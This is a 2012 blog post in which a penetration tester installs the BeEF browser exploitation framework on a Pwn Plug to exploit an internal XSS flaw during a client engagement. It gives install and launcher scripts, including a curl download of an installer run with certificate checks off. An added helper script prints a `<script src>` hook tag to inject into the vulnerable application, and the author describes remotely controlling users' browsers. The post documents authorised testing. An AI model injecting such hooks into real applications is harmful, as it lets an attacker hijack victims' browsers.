Thursday, October 11, 2012

BeEF and Pwnies - The Pwn Plug!


As a pentester, you sometimes need to think outside the box and use multiple techniques to prove to a client that they are vulnerable even on their internal network. I was recently working with a client that had an XSS vulnerability in one of their internal web applications that just was not accessible from the internet...

Until I introduced the client to BeEF and the Pwn Plug Elite.


I knew I could use BeEF to show the client the vulnerability, but I needed the BeEF server to be accessible on their internal network. That was where the Pwn Plug came to mind. But it did not come with BeEF out of the box. With BeEF being so flexible, I was able to install it on the Pwn Plug, and I wanted to share how I did that.

Here is the code to install all the requirements and set up the beef_launcher script.

All the commands should be typed while logged in to the Pwn Plug.

Code:


# update and install requirements
sudo apt-get update
sudo apt-get install curl git-core ruby subversion
sudo apt-get install libssl-dev libsqlite3-dev ruby1.9.2

# PwnPlug 1.1.1 has a directory called storage
# that is on the SD CARD with Metasploit
cd /storage/

# Downloading rvm-installer
# piping curl straight into bash would not work on the plug,
# so fetch the script to a file first and run it from there.
# -k turns off TLS certificate checking; drop it if the plug's CA bundle
# can validate github.com, and read the script before executing it.
curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer > rvm-installer
chmod +x rvm-installer
./rvm-installer

# /usr/local/rvm is the install location
echo '[[ -s "/usr/local/rvm/scripts/rvm" ]] && . "/usr/local/rvm/scripts/rvm"' >> ~/.bashrc
source ~/.bashrc
source /usr/local/rvm/scripts/rvm

# Installing Ruby 1.9.2 under rvm
# (q needs to be pressed during install when the pager appears)
rvm install 1.9.2
rvm use 1.9.2 --default

# Download BeEF
# git:// is unauthenticated; https://github.com/beefproject/beef.git
# gives you a verified connection to GitHub if the plug can reach it
git clone git://github.com/beefproject/beef.git
cd beef

# Installing Ruby Gems
gem install bundler
bundle install

The beef_launcher.sh script should be created separately, as /pentest/beef_launcher.sh.

#!/bin/bash
# beef_launcher.sh (save as /pentest/beef_launcher.sh)

# gem paths for the rvm-managed Ruby. rvm keeps the gem home for this
# interpreter at /usr/local/rvm/gems/ruby-1.9.2-p320 (no trailing /gems);
# check the installed patch level with `rvm list` and adjust if it differs.
export GEM_HOME=/usr/local/rvm/gems/ruby-1.9.2-p320
export GEM_PATH=/usr/local/rvm/gems/ruby-1.9.2-p320

# enter beef directory (stop if it is missing rather than launching elsewhere)
cd /storage/beef || exit 1

# print default password information
# change these in config.yaml before the plug goes onto a client network
echo 'DEFAULT USER/PASSWORD: beef/beef'
echo ''

# launch through the rvm wrapper for this ruby; -x resets the BeEF database
ruby-1.9.2-p320 beef -x

#end of beef_launcher.sh

And now...

#make /pentest/beef_launcher executable
chmod +x /pentest/beef_launcher.sh

#To run beef type
/pentest/beef_launcher.sh
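As an added example, not part of the original post and not BeEF's or Pwnie Express's own code: a pre-flight script you can run ahead of the launcher that reads BeEF's config.yaml, refuses to start while the admin UI still uses beef/beef, and derives the hook URL that goes into the XSS payload. It assumes the config.yaml keys used by BeEF 0.4.x (credentials user/passwd, http host/port/hook_file); the sample config and the 192.0.2.10 address are constructed for the demo.

```bash
#!/bin/bash
# Added example (not the original beef_launcher.sh): pre-flight checks before
# starting BeEF on a client's network. Assumes BeEF 0.4.x config.yaml keys
# (beef.credentials.user/passwd, beef.http.host/port/hook_file); adjust the
# key names if your BeEF version differs.

# Read the value of a "key: value" line from a YAML file, first match wins,
# surrounding double quotes stripped. Enough for BeEF's flat config; it is
# not a general YAML parser.
yaml_value() {
    awk -v key="$2" '$1 == (key ":") { v = $2; gsub(/"/, "", v); print v; exit }' "$1"
}

# True (exit 0) when the admin UI still uses the shipped beef/beef login.
# Anyone on the client LAN who reaches the UI with these can drive the
# hooked browsers, so the launcher should refuse to start in that state.
beef_has_default_creds() {
    [ "$(yaml_value "$1" user)" = "beef" ] && [ "$(yaml_value "$1" passwd)" = "beef" ]
}

# Print the URL a hooked browser must load. BeEF binds 0.0.0.0 by default,
# so the caller supplies the address victims can actually reach ($2),
# i.e. the Pwn Plug's address on the client's internal network.
beef_hook_url() {
    local host port hook
    host=$(yaml_value "$1" host)
    port=$(yaml_value "$1" port)
    hook=$(yaml_value "$1" hook_file)
    if [ "$host" = "0.0.0.0" ] || [ -z "$host" ]; then
        host="${2:?reachable address required when BeEF binds 0.0.0.0}"
    fi
    printf 'http://%s:%s%s\n' "$host" "${port:-3000}" "${hook:-/hook.js}"
}

# Constructed config.yaml excerpt for the demo (not taken from a real plug).
write_sample_config() {
    cat > "$1" <<'EOF'
beef:
    credentials:
        user:   "beef"
        passwd: "beef"
    http:
        host: "0.0.0.0"
        port: "3000"
        hook_file: "/hook.js"
EOF
}

# Demo: refuse to launch on default credentials, otherwise show the tag to
# drop into the XSS payload.
cfg=$(mktemp)
write_sample_config "$cfg"
if beef_has_default_creds "$cfg"; then
    echo "refusing to launch: config.yaml still has beef/beef, change it first"
else
    echo "inject: <script src=\"$(beef_hook_url "$cfg" 192.0.2.10)\"></script>"
fi
rm -f "$cfg"
```

Source this file at the top of the launcher and call beef_has_default_creds on /storage/beef/config.yaml before the ruby line; the reachable-address argument matters because the plug is the BeEF server, so the `<script src>` injected into the client's application has to point at the plug's address on their LAN, not at 0.0.0.0.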

By installing BeEF onto the Pwn Plug I was able to inject the BeEF hook into the vulnerable web application and remotely control users’ browsers thanks to the tunneling ability of the Pwn Plug. I couldn’t have landed the contract without the use of BeEF and the Pwn Plug.

This post contributed by:

Tobias Mccurry
Independent Security Consultant
Twitter - @lordsaibat
LinkedIn - http://www.linkedin.com/pub/tobias-mccurry-a-security-gsna-gcih/10/b81/477

P.S.
We have it on good authority from the Pwnie Express team that BeEF might be integrated in one or more of the Pwn Plugs soonish. Exciting! Keep an ear to the ground. You'll hear us running.
